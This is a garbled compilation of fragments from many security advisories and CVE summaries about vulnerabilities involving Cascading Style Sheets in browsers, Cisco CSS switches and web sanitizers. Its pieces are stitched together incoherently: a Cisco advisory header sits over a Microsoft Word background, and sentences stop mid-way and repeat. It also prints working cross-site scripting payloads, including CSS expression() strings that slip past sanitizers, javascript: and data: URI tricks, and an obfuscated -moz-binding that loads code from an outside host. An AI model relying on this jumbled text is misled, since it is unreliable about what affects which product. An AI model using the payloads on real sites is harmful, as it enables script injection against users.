Cascading Style Sheets
Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Cisco CSS / ACE Client Certificate and HTTP Header
Manipulation Vulnerabilities
Release Date: 2010-07-02
Application: Cisco Content Services Switch (CSS) / ACE Products
Versions: Cisco CSS 11500 - 08.20.1.01
Cisco ACE 4710 - Version A3(2.5) [build 3.0(0)A3(2.5)
May 13, 2008
I. BACKGROUND
Microsoft Word is a word processing application that is distributed with
Microsoft Office. Cascading Style Sheets (CSS) is a stylesheet language
used to describe the presentation of a document written in a markup
language. For more information about Microsoft Word, visit the
following URL.
http://office.microsoft.com/en-us/word/default.aspx
1) "Login Detection" - if the site redirects to a login page when
/myaccount is requested, we know the user is not logged in. Unless I
am mistaken, the same information can be collected through a number of
well-known vectors: image or script onload / onerror events, including
remote CSS or scripts and testing for side effects, page unload
timing, cache timing, CSS :visited, probing frames.length and other
publicly visible global properties, etc.
All of them are well-known (see "Resource inclusion probes" in BSH),
and AFAICT, do not pose any appreciable security risk. They are a
(CVE-2010-2753).
Integer overflow in an array class in Mozilla Firefox 3.5.x before
3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x
before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to
execute arbitrary code by placing many Cascading Style Sheets (CSS)
values in an array (CVE-2010-2752).
Multiple unspecified vulnerabilities in the browser engine in Mozilla
Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x
before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allow
Undocumented bug on Cisco CSS series 11000 with Webns 8.20.0.1
The SSH daemon on Cisco CSS series 11000 with the Webns system crashes
when hit by the old 2001 SSH CRC32 exploit
Cisco CSS :
Webns Version: 08.20.0.01 (using command sh ver)
SSH Version: SSHield version 1.6.1, SSH version OpenSSH_3.0.2p1 (using
command sh sshd version)
denial of service, etc.
DETAILS
=======
Cascade Server allows its users to write XSLT stylesheets which it
uses to transform XML source data into HTML or other formats. Cascade
Server employs the Apache XML Project's Xalan-Java XSLT processor to
perform these transformations.
The Xalan-Java site states, "For those situations where you would like
CVE-2009-1698
WebKit in qt4-x11 does not initialize a pointer during handling of a
Cascading Style Sheets (CSS) attr function call with a large numerical
argument, which allows remote attackers to execute arbitrary code or
cause a denial of service (memory corruption and application crash) via
a crafted HTML document.
ANY second appearance of the injected data will allow execution of script
code. The concept is that data inside tags such as script and style is
parsed by their own parser.
The CSS (style) parser has 2 characteristics that differentiate it from the
script parser:
1) It is a silent parser (there is no indication of failure)
2) It executes as batch operations per block, which means that closing
a NON-EXISTING (never opened) block will cause parsing of the following
blocks. What does this mean?!?!
account and then compose an e-mail message, related to a login CSRF
issue (CVE-2011-1491).
steps/utils/modcss.inc in Roundcube Webmail before 0.5.1 does
not properly verify that a request is an expected request for an
external Cascading Style Sheets (CSS) stylesheet, which allows remote
authenticated users to trigger arbitrary outbound TCP connections
from the server, and possibly obtain sensitive information, via a
crafted request (CVE-2011-1492).
Cross-site scripting (XSS) vulnerability in the UI messages
NSFOCUS Security Advisory (SA2007-01)
Microsoft IE5 CSS Parsing Memory Corruption Vulnerability
Release Date: 2007-08-15
CVE ID: CVE-2007-0943
http://www.nsfocus.com/english/homepage/research/0701.htm
use WebKit, such as Epiphany-webkit and Midori, to effect the necessary
changes.
Details follow:
It was discovered that WebKit did not properly handle Cascading Style Sheets
(CSS) import statements. If a user were tricked into opening a malicious
website, an attacker could cause a browser crash and possibly execute
arbitrary code with user privileges.
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690)
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
pointer during handling of a Cascading Style Sheets (CSS) attr function
call with a large numerical argument, which allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption
and application crash) via a crafted HTML document. (CVE-2009-1698)
WebKit in Apple Safari before 4.0.2, KHTML in kdelibs in KDE, QtWebKit
"recursion in certain DOM event handlers."
CVE-2009-1698
WebKit does not initialize a pointer during handling of a Cascading Style Sheets
(CSS) attr function call with a large numerical argument, which allows remote
attackers to execute arbitrary code or cause a denial of service (memory
corruption and application crash) via a crafted HTML document.
be freed and later accessed when an HTML error occurs, related to
recursion in certain DOM event handlers. (CVE-2009-1690).
WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1,
and iPhone OS for iPod touch 1.1 through 2.2.1 does not initialize a
pointer during handling of a Cascading Style Sheets (CSS) attr function
call with a large numerical argument, which allows remote attackers to
execute arbitrary code or cause a denial of service (memory corruption
and application crash) via a crafted HTML document (CVE-2009-1698).
KDE Konqueror allows remote attackers to cause a denial of service
ZDI-09-012: Microsoft Internet Explorer Malformed CSS Memory Corruption
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-012
February 10, 2009
-- CVE ID:
CVE-2009-0076
-- Affected Vendors:
Microsoft
arbitrary code, when visiting a malicious website.
CVE-2009-1698
It was discovered that there could be an uninitialised pointer when
handling a Cascading Style Sheets (CSS) attr function call. This could
lead to the execution of arbitrary code, when visiting a malicious
website.
CVE-2009-1687
CVE-2010-4577
The CSSParser::parseFontFaceSrc function in WebCore/css/CSSParser.cpp in
WebKit does not properly parse Cascading Style Sheets (CSS) token sequences,
which allows remote attackers to cause a denial of service
(out-of-bounds read) via a crafted local font, related to "Type Confusion."
CVE-2010-4578
decide Top Sites content.
Once the attack completes execution, the small window gets closed, and the
next time you use Safari Top Sites, the attacker-defined sites will have
replaced your existing legitimate sites. To decide which sites to replace,
an attacker can first use the CSS History Hack found by Jeremiah
Grossman[2] and then set fake sites corresponding to the websites the user
has visited. Hence, this could easily facilitate a serious phishing attack.
The situation is worsened by Safari's inadequate protection against URL
obfuscation attacks as highlighted in [3], which makes it almost impossible
for a regular user to spot the fake site and
* Tomas Hoger discovered an unspecified session fixation
vulnerability (CVE-2009-1580).
* Luc Beurton reported that functions/mime.php does not protect the
application's content from Cascading Style Sheets (CSS) positioning
in HTML e-mail messages (CVE-2009-1581).
Impact
======
www.eVuln.com advisory:
BBCode CSS XSS in slickMsg
Summary: http://evuln.com/vulns/162/summary.html
Details: http://evuln.com/vulns/162/description.html
-----------Summary-----------
eVuln ID: EV0162
Software: slickMsg
Vendor: n/a
Version: 0.7-alpha
Mozilla Firefox before 3.5.16 and 3.6.x before 3.6.13, Thunderbird
before 3.0.11 and 3.1.x before 3.1.7, and SeaMonkey before 2.0.11 do
not properly validate downloadable fonts before use within an operating
system's font implementation, which allows remote attackers to execute
arbitrary code via vectors related to @font-face Cascading Style Sheets
(CSS) rules (CVE-2010-3768).
The line-breaking implementation in Mozilla Firefox before 3.5.16 and
3.6.x before 3.6.13, Thunderbird before 3.0.11 and 3.1.x before 3.1.7,
and SeaMonkey before 2.0.11 on Windows does not properly handle long
ZDI-10-102: Microsoft Internet Explorer Stylesheet Array Removal Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-102
June 8, 2010
-- CVE ID:
CVE-2010-1262
-- Affected Vendors:
Microsoft
on CherryPy, written in Python. As I specialize in Web Application Security,
I obviously spent some time playing with it.
I used Firefox with the Live HTTP Headers add-on, which provides an easy way
to observe HTTP requests and responses. This is what got my attention:
http://localhost:8080/static/browse/browse.css
http://localhost:8080/static/jquery_ui/css/humanity-custom/jquery-ui-1.8.5.custom.css
http://localhost:8080/static/jquery.multiselect.css
Seems like accessing static resources. Nothing unusual. But what if ...
-------------
Microsoft Anti-XSS Library is used to protect applications from Cross-Site Scripting attacks, by providing methods for input sanitization.
Vulnerability
-------------
Microsoft Anti-XSS Library 3.0 and 4.0 are vulnerable to an attack in which an attacker is able to create a specially formed CSS, that after passing through the GetSafeHTML or GetSafeHtmlFragment methods, contains an expression that triggers a JavaScript call in Internet Explorer.
The following ASP.NET code demonstrates the vulnerability:
string data = Microsoft.Security.Application.Sanitizer.GetSafeHtml("<html>a<style><!--div{font-family:Foo,Bar\\,'a\\a';font-family:';color:expression(alert(1));y'}--></style><div>b</div></html>");
(Opera) <img src="%0Bjavascript:alert(document.domain)">
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>
3. Cross site scripting - allowed attributes
In some implementations, style attribute is allowed. As kses is not
designed to deal with XSS inside CSS, such configurations are
vulnerable, unless additional checks are added. In reality, code added
for cleaning CSS usually does not solve this problem in sufficient
degree.
Example:
(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C\23\78\73\73)" href="http://example.com">test</a>
CVE-2011-1440
Use-after-free vulnerability in Google Chrome allows remote attackers to cause
a denial of service or possibly have unspecified other impact via vectors
related to the ruby element and Cascading Style Sheets (CSS) token sequences.
CVE-2011-1444
Race condition in the sandbox launcher implementation in Google Chrome on
The JavaScript function toStaticHTML, which is found in Internet Explorer 8 and Internet Explorer 9, is used to sanitize HTML fragments from dynamic and potentially malicious content.
If an attacker can manage to pass malicious code through this function, s/he may be able to perform HTML injection based attacks (such as XSS).
Vulnerability
-------------
An attacker can create a specially formed CSS that after passing through the toStaticHTML function will contain an expression that will trigger a JavaScript call.
The following JavaScript code demonstrates the vulnerability:
<script>document.write(toStaticHTML("<style>div{color:rgb(0,0,0)&a=expression(alert(1))}</style>Adi Cohen"))</script>
head element. If a user were tricked into viewing a malicious website, an
attacker could cause a denial of service or possibly execute arbitrary code
with the privileges of the user invoking the program. (CVE-2009-1690)
It was discovered that KDE-Libs did not properly handle the Cascading Style
Sheets (CSS) attr function call. If a user were tricked into viewing a
malicious website, an attacker could cause a denial of service or possibly
execute arbitrary code with the privileges of the user invoking the
program. (CVE-2009-1698)